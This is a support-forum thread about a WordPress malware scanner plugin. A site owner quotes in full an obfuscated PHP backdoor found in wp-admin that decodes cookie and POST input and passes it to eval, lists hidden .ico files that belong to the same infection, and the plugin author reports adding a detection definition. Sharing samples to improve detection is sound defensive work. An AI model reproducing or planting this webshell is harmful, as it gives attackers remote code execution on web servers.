Home › Forums › Support Forum › Scan potential threats
Tagged: new threat
This topic contains 3 replies, has 2 voices, and was last updated by Steven Baron 6 years, 2 months ago.
-
AuthorPosts
-
September 30, 2018 at 5:57 am #2167
I have been fighting a continual hack on a bunch of my WP sites. Then came across your plugin and giving it a shot to see how it works. So far pretty impressed…
The majority of the attack seem so be .ICO and .PHP files. The .ICO are easy as lal I do is a file scan and delete them. The .PHP seem sot be arbitrary names. Your scanner picked a bunch up as potential. For example…
wp-admin\pv3f8ux4.php contains:
<?php
$fqpee = ’4-dcb\’2ypu1tlk763#nmoxav58*seH_0f9igr’;$nueyq = Array();$nueyq[] = $fqpee[29].$fqpee[26];$nueyq[] = $fqpee[17];$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28];$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11];$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];foreach ($nueyq[7]($_COOKIE, $_POST) as $jsipkrj => $gnufbpt){function xbhdvq($nueyq, $jsipkrj, $swvqcr){return $nueyq[6]($nueyq[4]($jsipkrj . $nueyq[2], ($swvqcr / $nueyq[8]($jsipkrj)) + 1), 0, $swvqcr);}function iopoq($nueyq, $bartqre){return @$nueyq[9]($nueyq[0], $bartqre);}function cwrxi($nueyq, $bartqre){$ynhwgv = $nueyq[3]($bartqre) % 3;if (!$ynhwgv) {eval($bartqre[1]($bartqre[2]));exit();}}$gnufbpt = iopoq($nueyq, $gnufbpt);cwrxi($nueyq, $nueyq[5]($nueyq[1], $gnufbpt ^ xbhdvq($nueyq, $jsipkrj, $nueyq[8]($gnufbpt))));}
Is there any way that if I submit files and code that you can add them to the threat list? Or is this, just one of those things that will require manual intervention each time? Other suggestions?
While I can easily navigate to the location it would be nice if the potential threat section had a check box to allow selection and deletion of files.
September 30, 2018 at 7:09 pm #2168Thanks for sending me this code sample. This is another variant a wide-spread threat that has popped up recently. I have updated the definition with this new variant so my plugin should now be able to find and fix this one too. Please download the latest definition update and let me know if there’s anything else.
October 1, 2018 at 3:41 am #2169There are litterly dozens of these randomly named files that are scattered through out the sites. The code in each on is very different but seems to use the same base for encryption. With that it seems that .ICO files are apart of the attack. I would recommend removing it from the skip files with the following extensions. Do you want me to send you more code samples for comparison?
Also in addition to the manual removal request ability on the potential threat location, maybe you should have a submit for evaluation as an option next to the “white list” when you click on the file. This would save a lot of time reporting and getting the attack code in your hands quicker If you think it might be miss used then maybe activate that option for users that have donated as it will validate the user and allow a little tighter control.
October 1, 2018 at 5:04 am #2170Here is an example of 2 .ICO files from different sites that were found once I removed it from the skip files and was caught by the scanner…
wp-includes/js/thickbox/.bcb5a93b.ico
wp-content/plugins/skimlinks/.f397826e.ico -
AuthorPosts
You must be logged in to reply to this topic.